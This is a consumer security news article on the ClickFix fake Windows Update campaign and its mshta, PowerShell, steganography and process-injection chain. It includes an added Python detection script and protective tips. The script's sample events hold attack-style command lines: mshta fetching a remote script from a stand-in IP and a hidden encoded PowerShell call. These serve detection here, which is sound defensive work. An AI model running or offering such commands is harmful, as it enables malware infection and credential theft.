Fake Windows Update Drives Malware in New ClickFix Attack
Cybercriminals continue to get better at blending their scams into the software you use every day.
In recent years, we’ve seen phishing pages copying banking portals, fake browser alerts claiming your device is infected, and “human verification” screens that force you to execute commands you should never touch. The latest twist comes from the ongoing ClickFix campaign.
Instead of asking you to prove you’re human, attackers now disguise the lure as a Windows update. It looks convincing enough that you can follow the instructions without thinking, which is exactly what they want.

The malware hides inside seemingly normal image files and uses steganography to bypass traditional security tools. (Microsoft)
How the fake update works
Researchers at Joe Security noted that ClickFix has updated its old trick. The campaign used to rely on human verification pages, but now a full-screen Windows Update screen appears that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages, and a prompt telling you to complete a critical security update.
If you’re on Windows, the site tells you to open the Run box and paste what the page has already placed on your clipboard. That “something” is a command that silently downloads a malware dropper. The final payload is usually an information stealer, which steals passwords, cookies, and other data from your machine.

Fake update screens are becoming harder to detect as attackers imitate Windows with near-perfect accuracy. (Joe Security)
The moment you paste the command, the infection chain begins. First, the command launches mshta.exe, a legitimate Windows binary, which reaches out to a remote server and fetches a script. To avoid detection, these URLs typically use hexadecimal encoding for parts of the address and rotate their paths. The script then executes obfuscated PowerShell code filled with junk instructions to throw off investigators. Once PowerShell does its job, it decrypts a hidden .NET assembly that acts as a loader.
Why is this attack so difficult to detect?
The loader hides its next stage inside what looks like a normal PNG file. ClickFix uses custom steganography, which is a technique that hides secret data within normal-looking content. In this case, the malware is located within the pixel data of the image. Attackers modify color values in certain pixels, especially in the red channel, to embed shellcode fragments. When you see the picture, everything looks normal.
The script knows exactly where the hidden data is located. It extracts pixel values, decrypts them, and reconstructs the malware directly in memory. That means nothing obvious is written to the disk. Security tools that rely on file scanning miss this, as the shellcode never appears as a standalone file.
Once rebuilt, the shellcode is injected into a trusted Windows process such as explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix activity has spawned infostealers like LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them back to the attacker with very little noise.

Once the hidden code is loaded into a trusted Windows process, information thieves silently begin collecting your data. (Kurt “CyberGuy” Knutsson)
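The early stages of the chain described above (mshta.exe launched from the Run box, a remote URL with percent-hex-encoded segments, then hidden, encoded PowerShell) leave a recognisable footprint in process-creation telemetry. The following is an added example, not code from the original article or from Joe Security, that scores constructed sample events against those indicators; the event format, field names and sample values are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample process-creation events (not real telemetry). Each record is
# (parent image, child image, command line), modelled on the ClickFix chain:
# Run box (explorer.exe) -> mshta.exe fetching a remote script -> hidden PowerShell.
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe",
     "mshta.exe http://203.0.113.10/%75%70%64%61%74%65/win.hta"),
    ("mshta.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -EncodedCommand BASE64PLACEHOLDER"),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\me\\notes.txt"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# Three or more consecutive %XX escapes: the hex-encoded URL segments the page describes.
HEX_ESCAPE = re.compile(r"(?:%[0-9A-Fa-f]{2}){3,}")
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def score_event(parent, child, cmdline):
    """Return (score, reasons) for one process-creation event.

    Each matched indicator adds one point; reasons explain the score to an analyst.
    """
    reasons = []
    child_l, parent_l, cmd_l = child.lower(), parent.lower(), cmdline.lower()
    if child_l == "mshta.exe" and URL.search(cmdline):
        reasons.append("mshta.exe launched with a remote URL")
        if parent_l == "explorer.exe":
            reasons.append("parent is explorer.exe, consistent with the Run box")
        hex_part = HEX_ESCAPE.search(cmdline)
        if hex_part:
            # Decode the escaped segment so the analyst sees the real path component.
            reasons.append("hex-encoded URL segment decodes to '%s'" % unquote(hex_part.group(0)))
    if child_l == "powershell.exe":
        if parent_l == "mshta.exe":
            reasons.append("powershell.exe spawned by mshta.exe")
        if "-encodedcommand" in cmd_l or " -enc " in cmd_l or " -e " in cmd_l:
            reasons.append("PowerShell encoded command")
        if "-w hidden" in cmd_l or "-windowstyle hidden" in cmd_l:
            reasons.append("hidden PowerShell window")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return (cmdline, reasons) for every event whose score reaches the threshold."""
    hits = []
    for parent, child, cmdline in events:
        score, reasons = score_event(parent, child, cmdline)
        if score >= threshold:
            hits.append((cmdline, reasons))
    return hits
```

A single indicator (for example mshta.exe with a URL) is noisy on its own; requiring two or more, as `triage` does, keeps the benign notepad and svchost events out of the alert list.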
7 steps you can take to protect yourself from the ClickFix campaign
The best way to stay protected is to slow down for a moment and take some steps that will cut off these attacks before they start.
1) Never execute commands that you did not request
If any site asks you to paste a command into Run, PowerShell, or Terminal, treat it as an immediate warning sign. Actual OS updates never require you to run commands from a web page. When you execute that command, you hand over full control to the attacker. If something seems off, close the page and stop interacting with it.
2) Keep Windows Updates inside Windows
Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up window pretending to be a Windows update is always fake. If you see something outside of the normal update flow prompting your action, ignore it and check the actual Windows Update page yourself.
3) Use a trusted antivirus
Choose a security suite that can detect both file-based and memory-based threats. Stealth attacks like ClickFix avoid leaving obvious files for scanners to detect. Tools with behavior detection, sandboxing, and script monitoring give you a much better chance of detecting unusual activity early.
The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.
Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com.
4) Use a password manager
Password managers create strong, unique passwords for each account you use. They also autofill only on the legitimate website, helping you detect fake login pages. If your password manager refuses to fill in your credentials, check the URL before entering anything manually.
Next, check to see if your email has been exposed in previous breaches. Our #1 pick for password manager includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.
Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.
5) Use a personal data deletion service
Many attacks start by targeting emails and personal data that are already exposed online. Data removal services help reduce your digital footprint by requesting removals from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers will have easy access to your data.
While no service can guarantee complete removal of your data from the Internet, a data deletion service is a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leaked data with information they can find on the dark web, making it harder for them to target you.
Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com.
6) Check URLs before trusting anything
A compelling design does not mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses strange spelling or extra characters, close it. Attackers rely on the fact that people recognize the layout of a page but ignore the address bar.
7) Close suspicious pages in full screen
Fake update pages often run in full screen mode to hide the browser interface and make the page look like part of your computer. If a site suddenly goes full screen without your permission, exit with Esc or Alt+Tab. Once you are out, scan your system and do not return to that page.
Kurt’s Key Takeaway
ClickFix works because it is based on user interaction. Nothing happens unless you follow the on-screen instructions. That makes the fake Windows Update page especially dangerous, because it takes advantage of something that most people trust. If you’re used to Windows updates taking over your screen, you may not question the message that appears during the process. Cybercriminals know this. They copy trusted interfaces to get you to let your guard down, then rely on you to execute the final command. The technical tricks that follow are complex, but the starting point is simple. They need you to help them.
Have you ever copied commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.
Copyright 2025 CyberGuy.com. All rights reserved.
Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.